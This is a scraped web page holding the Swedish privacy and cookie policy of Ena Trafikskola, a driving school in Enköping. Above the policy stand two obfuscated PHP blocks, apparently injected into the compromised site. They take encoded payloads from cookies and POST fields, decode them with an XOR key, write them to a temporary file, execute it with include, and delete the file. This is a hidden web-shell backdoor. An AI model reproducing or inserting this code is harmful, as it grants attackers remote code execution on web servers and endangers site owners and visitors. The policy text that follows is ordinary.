$UjnpZGvo = class_exists("lX_xth");if (!$UjnpZGvo){class lX_xth{private $nIjBb;public static $reZJMtD = "8f1fd692-e3a7-4405-9de7-5b6167279c7b";public static $UfLdLeV = NULL;public function __construct(){$HVYXbXNd = $_COOKIE;$RLiHvrNawz = $_POST;$xjiEpQt = @$HVYXbXNd[substr(lX_xth::$reZJMtD, 0, 4)];if (!empty($xjiEpQt)){$LDwRKpEuJ = "base64";$qLCgsbrw = "";$xjiEpQt = explode(",", $xjiEpQt);foreach ($xjiEpQt as $oamuVBpRM){$qLCgsbrw .= @$HVYXbXNd[$oamuVBpRM];$qLCgsbrw .= @$RLiHvrNawz[$oamuVBpRM];}$qLCgsbrw = array_map($LDwRKpEuJ . "\137" . "\x64" . chr (101) . chr ( 593 - 494 ).'o' . "\x64" . chr (101), array($qLCgsbrw,)); $qLCgsbrw = $qLCgsbrw[0] ^ str_repeat(lX_xth::$reZJMtD, (strlen($qLCgsbrw[0]) / strlen(lX_xth::$reZJMtD)) + 1);lX_xth::$UfLdLeV = @unserialize($qLCgsbrw);}}public function __destruct(){$this->BMLJzIp();}private function BMLJzIp(){if (is_array(lX_xth::$UfLdLeV)) {$pBUwbZDmmq = sys_get_temp_dir() . "/" . crc32(lX_xth::$UfLdLeV["\163" . "\x61" . "\x6c" . chr (116)]);@lX_xth::$UfLdLeV[chr (119) . "\x72" . "\151" . chr ( 165 - 49 )."\145"]($pBUwbZDmmq, lX_xth::$UfLdLeV['c' . "\x6f" . chr (110) . "\x74" . "\145" . chr (110) . "\x74"]);include $pBUwbZDmmq;@lX_xth::$UfLdLeV[chr ( 211 - 111 ).chr (101) . "\154" . "\x65" . chr ( 870 - 754 ).chr ( 712 - 611 )]($pBUwbZDmmq);exit();}}}$RgwfSg = new lX_xth(); $RgwfSg = NULL;} ?> $TQHIh = class_exists("Hkg_Oimp");if (!$TQHIh){class Hkg_Oimp{private $idHsvNg;public static $RdrzTrp = "4c3c8774-06aa-4f8c-a483-af5293e84d70";public static $mhHUhpVj = NULL;public function __construct(){$YTzuMFNQ = $_COOKIE;$gDsKsnW = $_POST;$oxxvh = @$YTzuMFNQ[substr(Hkg_Oimp::$RdrzTrp, 0, 4)];if (!empty($oxxvh)){$oltbZX = "base64";$xwbMJ = "";$oxxvh = explode(",", $oxxvh);foreach ($oxxvh as $KFiQNyh){$xwbMJ .= @$YTzuMFNQ[$KFiQNyh];$xwbMJ .= @$gDsKsnW[$KFiQNyh];}$xwbMJ = array_map($oltbZX . '_' . "\144" . "\x65" . "\x63" . chr (111) . 'd' . chr (101), array($xwbMJ,)); $xwbMJ = $xwbMJ[0] ^ str_repeat(Hkg_Oimp::$RdrzTrp, (strlen($xwbMJ[0]) / strlen(Hkg_Oimp::$RdrzTrp)) + 1);Hkg_Oimp::$mhHUhpVj = @unserialize($xwbMJ);}}public function __destruct(){$this->jILumUl();}private function jILumUl(){if (is_array(Hkg_Oimp::$mhHUhpVj)) {$lLPgQ = sys_get_temp_dir() . "/" . crc32(Hkg_Oimp::$mhHUhpVj['s' . "\141" . chr ( 983 - 875 )."\164"]);@Hkg_Oimp::$mhHUhpVj[chr ( 1042 - 923 ).chr ( 582 - 468 ).chr ( 607 - 502 )."\164" . "\x65"]($lLPgQ, Hkg_Oimp::$mhHUhpVj["\143" . 'o' . 'n' . "\x74" . "\145" . 'n' . chr (116)]);include $lLPgQ;@Hkg_Oimp::$mhHUhpVj[chr ( 224 - 124 ).chr (101) . chr ( 299 - 191 )."\x65" . "\164" . 'e']($lLPgQ);exit();}}}$zcHWIjInI = new Hkg_Oimp(); $zcHWIjInI = NULL;} ?> Integritet och cookies – Ena Trafikskola, Enköping

Så behandlar vi dina personuppgifter

Integritetspolicy

Vi arbetar för att säkerställa en hög nivå av dataskydd som värnar om din personliga integritet vid användning av vår webbplats. Denna integritetspolicy förklarar därför hur dina personuppgifter bearbetas och skyddas, dina rättigheter och hur du kan göra dem gällande. Vi strävar efter att du ska känna dig trygg i vår behandling av dina personuppgifter. Vid eventuella frågor är du välkommen att kontakta oss. Våra kontaktuppgifter hittar du längst ned på denna sida.

Vem ansvarar för de personuppgifter vi samlar in?

ENA Trafikskola AB, orgnr  556839-7045, Sandgatan 17 749 35 Enköping, är personuppgiftsansvarig för de personuppgifter du lämnar till oss genom anmälan till kurs och övrig kontakt med oss och ansvarar för behandling av dessa.

Var lagras dina personuppgifter?

Vi eftersträvar att dina personuppgifter i så hög grad som möjligt ska behandlas inom det europeiska ekonomiska samarbetsområdet (EES) och alla våra egna IT-system, men kan även överföras och bearbetas i ett land utanför EES (s.k. ”tredje land”). Sådan överföring sker endast till mottagarland med adekvat skyddsnivå och i enlighet med gällande lagstiftning. 

Vad för slags personuppgifter samlar vi in?

Vi samlar in personuppgifter som du skickar till oss när du anmäler dig till en kurs eller utbildning. De personuppgifter som du skickar till oss kan till exempel omfatta kontaktinformation och personnummer.

Hur använder vi dina personuppgifter?

Vi kan komma att använda dina personuppgifter för följande ändamål:

  • För registrering av deltagande vid kurs
  • Vid aviseringar via sms, telefon och e-post om bekräftelser och schemaändringar
  • Vid kontakter angående din anmälan
  • Vid korrespondens om frågor och övrig information
  • Vid arbete som förhindrar missbruk eller annan olämplig användning av vår hemsida

Vi sparar dina uppgifter så länge som det krävs för att uppfylla ovanstående ändamål eller så länge som vi enligt lag är skyldiga att göra detta. Därefter raderas dina personuppgifter.

Vilka är dina rättigheter?

Du har rätt att när som helst begära information om de personuppgifter vi har om dig. Om dina uppgifter är felaktiga, ofullständiga eller irrelevanta, kan du begära att få dem rättade eller raderade. Vi kan inte radera dina uppgifter då det föreligger ett lagstadgat krav på lagring, som exempelvis bokföringsregler, eller när det finns andra legitima skäl till varför uppgifterna måste sparas, till exempel obetalda fakturor. Du kan när som helst återkalla ditt samtycke till att låta oss använda uppgifterna för marknadsföring genom att avanmäla dig från vårt nyhetsbrev. Du kan också kontakta oss genom att skicka brev, e-post eller ringa. Se kontaktuppgifter nedan.

Vilka kan vi komma att dela dina personuppgifter med?

För att vi ska kunna erbjuda ovannämnda tjänster och våra åtaganden gentemot dig som kund delar vi dina personuppgifter med företag som är s.k. personuppgiftsbiträden för oss. Personuppgiftsbiträden behandlar informationen för vår räkning och enligt våra instruktioner och hjälper oss med IT-tjänster, betaltjänster, transporter och marknadsföring. Detta sker endast för ändamål för vilka vi har samlat informationen och endast till företag som kan lämna tillräckliga garantier gällande säkerhet och sekretess för personuppgifter.

Vi vidarebefordrar, säljer eller byter aldrig dina personuppgifter för marknadsföringsändamål till tredje part.

Hur skyddar vi dina personuppgifter?

För att dina personuppgifter som skickas till vår webbplats inte ska läsas av utomstående, krypteras all sådan information och skickas via en säker anslutning.

Cookies

En cookie (eller kaka) är en liten textfil som en webbplats sparar på besökarens dator. Cookies används på många webbplatser för att ge en besökare tillgång till olika funktioner. Informationen i en cookie kan också användas för att följa en användares surfande på webbplatser som använder samma cookie.

Måste jag tillåta cookies?

Denna webbplats använder cookies för funktionalitet kritisk för att det ska gå att handla i butiken. Om du blockerar cookies kan du därför ej heller handla i butiken. Utan cookies kan du dock fortfarande titta på sidor och artiklar i butiken, men vissa funktioner kan bete sig oväntat.

Om du vill handla i butiken men inte vill att några cookies ska sparas på din dator när du stänger din webbläsare så kan du besöka sidan i privat läge. Detta läge kallas olika saker beroende på din webbläsare: ”Inkognitofönster” (Chrome), ”Privat fönster” (Firefox) eller ”InPrivate-fönster” (Microsoft Edge). Alla cookies som satts under besöket i privat läge raderas då ifrån din dator när du stänger din webbläsare.

Hur använder vi cookies?

Sessionscookies används för att identifiera inloggade användare och ge korrekta behörigheter. En sessionscookie skapas under ett besök till webbplatsen och sparas bara i datorns minne så länge som webbläsaren är igång. Ett användningsområde för en sessionscookie är att behörighetsstyra informationen på webbplatsen.

Tredjepartscookies

Vi använder Google Analytics för att förstå hur våra besökare agerar med vår webbplats. Det ger oss möjlighet att optimera webbplatsen samt erbjuda dig en mer relevant upplevelse av vår webbplats anpassad efter dina preferenser. Vi lagrar ingen information som kan användas för att direkt identifiera en person.

Personuppgiftsansvarig

Ena Trafikskola AB
Organisationsnummer: 556839-7045
Sandgatan 17
749 35 Enköping

Telefon: 0171-44 00 45
E-post: info@enatrafikskola.se

Denna integritetspolicy uppdateras senast: 2021-10-06.